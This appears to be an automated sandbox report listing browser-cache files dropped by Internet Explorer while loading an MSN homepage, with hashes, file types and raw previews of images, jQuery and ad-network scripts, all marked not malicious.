Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....t.c.....@.n....`R[..J....q rh..Ks@.#....$,Yp(......L..(...4................K..s.'..P.E..DF$....S.<.4.5<y..u;.8.b....Qs..MB..r..w.a..S.M...J.-4:6.4...Zn.c.m.@..m....\.fcr..U....1.1....z@!....<..`....4....H....1.f...........s.@..}...../a.HL.%#Lq.....l..b.....V$T-.@.!....Hc.`.(..p8...K.:.S..hi..:q.{.....T.Z.K...9.P.6}..J.&.1@...0..$.h...@.Q.b.../Jc.x...@ ......q@..i.".

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPawMj[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	15918
Entropy (8bit):	7.883595561989866
Encrypted:	false
SSDEEP:	384:N4CI4vEcKt6FJZoSOxA7U2a0SB3ILeiNdw:N431cqUJuSIqUVa7w
MD5:	243AA228CED40BA0C9765B012F7E0816
SHA1:	E8882596E9BB575A6B622EB233A0FAE04CF41FCF
SHA-256:	3909BF0723B337A449C1987869CE27F4439BA6BE35EC267E49501AD420C02B9F
SHA-512:	D8DBCB31337FFD76DF53A66B10E570FCA9EF98C4E97240CCF92AA96B0BF5B349A128281B22AA0820E5AFA99D30DCA3EB88A2944B4E2FB0DA8D74E7B54E5F712B
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...9F....>.4...b....w.......!.L.........3@........f.....W9......8L.R}iX.K.."..D..E&\.. ..a..f.....pB..R^.S'...@.(LlA.."s.J.$.w.i.z.H&.....FM+....^.&&@J..h.&TP!./jb....x.1XNq@..(.....J.\S....... .....4.c.1.>....P.....4..q..0.(B.....&G...\.. .AL......{.1...E..6....C.'..I..6...Q.....p.0...R.R.r.P..m.7>.....X'...........1.RA.q.../.+....W.)X.0..Z.X......Jv.'..BI..nOz..J......./..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB10MkbM[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	936
Entropy (8bit):	7.711185429072882
Encrypted:	false
SSDEEP:	24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
MD5:	19B9391F3CA20AA5671834C668105A22
SHA1:	81C2522FC7C808683191D2469426DFC06100F574
SHA-256:	3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
SHA-512:	0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......\|.7....r.x..S.?.ws....B9.P.-Yt..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.CWB..F...b../.H..\...).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@.....A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu..A)...-.w..1/+.)....XR.A#;..X...p..3!...H.....f.ok;..\|x..1.R.\W.H\...<..<&.M!mk:\|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB116fUs[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	458
Entropy (8bit):	7.210742812446173
Encrypted:	false
SSDEEP:	12:6v/7XBvDtGBGFqRb8EJYYkQfCtK3Ir3v98:UtDEBYqV8E7k6V+F8
MD5:	2343404EAEB895F56B8EA1C57104CC46
SHA1:	C3A894822DEB625BBEC44E58194DE48CDA7A133F
SHA-256:	CCABAA94321280B2F25C0937FC67E13227150D42A81DBCDF073DBC1F8B0F41D9
SHA-512:	8953413DE432A1DEC0E59A64316338FB699BAB2FFBB1FA63AD99CA1E131D4220C9005E446C8F2BAA737CE91174820258EFD95B0361D9EDBBCD4108F7E0909835
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+.....\|IDATx....+.q....Z."...FI.....,.AX....I...NI6.K9...DN..~.\|^..wP.S..{...;..y..//....@qYr.bj...E.pf.:{......8.....V..`...CP.1.{....S......+...I.I...%.@...r...`.z9....).YD....ZT ...G^uK}..........\|..8'......{......R.FHCL C.).._..p.E. ..?W....Z.{Lb....0.S...f.@..9.t.....4..A..C!t..h..%^..p0.c.....%h.\|.>o+......`.5...^.@.h.Vx.....0..H...hE........... .W..07.1....<.....I....,.c........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1fdtSt[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	modified
Size (bytes):	438
Entropy (8bit):	7.245257101036661
Encrypted:	false
SSDEEP:	12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
MD5:	3F46112E8E54A82D0D7F8883CF12A86F
SHA1:	AA1A3340F167A655D0A0A087D0F6CBF98026296C
SHA-256:	E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
SHA-512:	EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+.....hIDATx...O+DQ../]....f..(,.,-.!.L..X..ee.,.. .I.D..h..P,&.\|.c.L.i.E.{.k..~.}.}........t...W....5.2..0)X0I.c.wbU.....N..,....-F...J#lSq.;....a........D .w.g..N.....F)l..........`_..s..A;?.4..+..ob......Qh.H.:A......(....;.z./..?.:...t.[.e..b.......{..t.A....M..0.>8&_"... Ev.Z`.."...=/..F.}X....#\|.Ny. Z......W...{HX;..F..w..M:...?W.<4B..!.I.....l.o...s....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	470
Entropy (8bit):	7.360134959630715
Encrypted:	false
SSDEEP:	12:6v/7TIG/Kupc9GcBphmZgPEHfMwY7yWQtygnntrNKKBBN:3KKEc9GcXhmZwM9LtyGJKKBBN
MD5:	B6EA6C62BAEBF35525A53599C0D6F151
SHA1:	4FFEFB243AAEC286D37B855FBE33C790795B1896
SHA-256:	71CC7A3782241824ACDC2D6759E455399957E3C7C9433A1712C3947E2890A4D4
SHA-512:	0E4E87A66CF6E01750BC34D2D1EC5B63494A7F5C4B831935DD00E1D825CDB1CFD3C3E90F29D1D4076E7F24C9C287E59BE23627D748DB05FB433A3A535F115464
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..QKN.A....(..1a.....p...o..T........./.......$..n\...V.C .b2.......qe'.T.1.1h8./.....$:Y6...w}_>...P.o$.n....X,<...R..y....$p.P..c.\.7..f...H.vm...I........b..K..3.....R..u...Z'.?..$.B...l.r....H.1....MN).c.K1H..........t...9........d.$.....:..8..8@t._...1.".@C....i&Z.'...A1...!....R....}.w.E4.\|_..N.....b...(.^.vH........j......s...h. ..9.p!.....gT.=B.\|..,=v.......G..c.5.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBXXVfm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	842
Entropy (8bit):	7.712790381238881
Encrypted:	false
SSDEEP:	24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
MD5:	4F44C5854D2A321DE38DDA7580D99D2A
SHA1:	637217CD4AB94060B945D364D6AD80BB173F41B7
SHA-256:	77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
SHA-512:	AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.\|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r\|......\|1?S.\|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X\|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.\|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	27135
Entropy (8bit):	5.33237304261757
Encrypted:	false
SSDEEP:	384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
MD5:	2C50DB6096770441093C246D675D2E89
SHA1:	67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
SHA-256:	303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
SHA-512:	4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	428851
Entropy (8bit):	5.436909384555583
Encrypted:	false
SSDEEP:	3072:E/dJUMxx+IAkJ8B647/jnlIFMB3YS2q5tceLQYYmeS/yAZFP47eaXA+JxLf:E/dTOIcsFrqMeLQY7ebAZC7VbJh
MD5:	73C6E1DB12AD08A88FE7358C56BDCE2E
SHA1:	5C5B3641E102B353E869573679EE4BF8DD040E42
SHA-256:	E447FA1388B75231161EA3B2CD577583C0C186A208571DDA22CE3150C769338A
SHA-512:	9DCF0677F24ABC407A59BF2D8ECC80FDC584BE84BAD0114C1711631D122D6774A83452C0C4AE03C475EC702ECEF5AE3FC182336D8717F1C0BC76811A779C530C
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211001_24816374;a:6fb5c0c6-9650-4348-95f2-8f7a413ac4e1;cn:9;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 9, sn: neurope-prod-hp, dt: 2021-09-29T17:58:24.1842677Z, bt: 2021-10-01T00:14:52.8166315Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-10-07 13:51:24Z;axd:;f:msnallexpusers,muidflt18cf,muidflt299cf,muidflt315cf,oneboxdhpcf,mmxandroid1cf,mmxios1cf,startedge1cf,platagyedge1cf,complianceedge1cf,pnehp1cf,moneyhp3cf,bingcollabhp1cf,pnehz2cf,pnehz3cf,compliancehz1cf,article4cf,onetrustpoplive,anaheim1cf,1s-bing-news,vebudumu04302020,bbh20200521msn,msnsports2cf,msnsports4cf,weather2cf,1s-br30min,btrecrow1,1s-winauthservice,weather8cf;userOptOut:false;userOptOutOptions:" data-js="{"dp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	79097
Entropy (8bit):	5.337866393801766
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
MD5:	408DDD452219F77E388108945DE7D0FE
SHA1:	C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
SHA-256:	197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
SHA-512:	17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
Malicious:	false
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	1.240940859118772
Encrypted:	false
SSDEEP:	3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
MD5:	4123CE1E1732F202F60292941FF1487D
SHA1:	9F12B11BDE582DAE37CE8C160537D919C561C464
SHA-256:	D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
SHA-512:	11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
Malicious:	false
Preview:	..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_171f8b8d6097fca0bfa9b18571e0f954[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	dropped
Size (bytes):	11572
Entropy (8bit):	7.894824371630134
Encrypted:	false
SSDEEP:	192:qUtUHfHDqeI0q/1gvw3N3pIXJg6n9BenljBv4a8IZvmtUrY9/8F/pEIezP8JBrrN:qUtgLo0gHd3pIXa6nWl1gIgtUrkUFhEK
MD5:	C5B7AB143A42CDF3600CFB874FC63354
SHA1:	158CB91461BB637E7B8B7F6953D427BF3E72A172
SHA-256:	31D78A209BCF6ED10E83C1A002680F0923B6BA9C8394CBC1CA1AC8F245439BA3
SHA-512:	9AA5385366BC3913EB4B674E9F5540354CFFC8FA51FB22CD2AFFE62480A08991387605ABCA6E85091A5B5952A20DD5AE9F74F86CE7DAE596923B4937D0565D5D
Malicious:	false
Preview:	......JFIF............. ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-applIY..DJo~...r..Qj................................desc.......dcprt...`...#wtpt........rXYZ........gXYZ........bXYZ........rTRC........chad.......,bTRC........gTRC........desc........PHL 243V5...............................................................................text....Copyright Apple Inc., 2020..XYZ ................XYZ ......iD..6....eXYZ ......c.........XYZ ......).........para............sf32...............W...).....................................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........5..................................................................}-8&+m..2B.p..\{.....o#..3B..R...$B.. .q3...Llz..L%.\|.(.vC.a......R...u.&.Ui._0..R<2....d.k..u..Dt.l..N..Vu.J.eY"XA..VWv.;.NR..j].k@V]i...M.k,.5.z#...U.2y.\....-..s.E.W?...S.yu..YNG.,P[....U..Q\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	410910
Entropy (8bit):	5.48696512542413
Encrypted:	false
SSDEEP:	6144:zAikYqP1vG2jnmuynGJ8nKM03VCuPbe2JpJzzYmS:c1vFjKnGJ8KMGxTxYmS
MD5:	1D6D11CB347263E23048972FE9150281
SHA1:	1CDB76AD912C5BFB8A8D1DA23A9C19E0D1625FBF
SHA-256:	952D70671073A4FC7B1AC5F5F2B5C757D70B6D6E9A8265D39E81103818234B13
SHA-512:	3B042D4B2AD5E7310204D774205C0240E4B756BEB80B1E67F44F8F06C7E0472C02E597B1FBCBB9FE7CE7A8E2E3602FC45C2E1C62340BAA0CCC6FE38A1B1DD9CD
Malicious:	false
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	410910
Entropy (8bit):	5.4868855518693955
Encrypted:	false
SSDEEP:	6144:zUikYqP1vG2jnmuynGJ8nKM03VCuPbF2JpJzzYmS:Q1vFjKnGJ8KMGxToYmS
MD5:	F74DEB4DF639EAF7399111010A7182CF
SHA1:	CAE6B2734066E07ADA1B7705E37A9D6D3DDEF3E3
SHA-256:	84DB6BECF064AFFE1B39C7EF73C04334BFB5B495D9D2F6F5D689EAAE4808BEFD
SHA-512:	8AD249BB9ADCDD265F1266D8B50A3AA6A770930CC007745A35DA784A38DD020E7CF30581262C7B052CD6BBAFE4FAE86D21DE214E3EBB17C2DB0F7DCB6DD32685
Malicious:	false
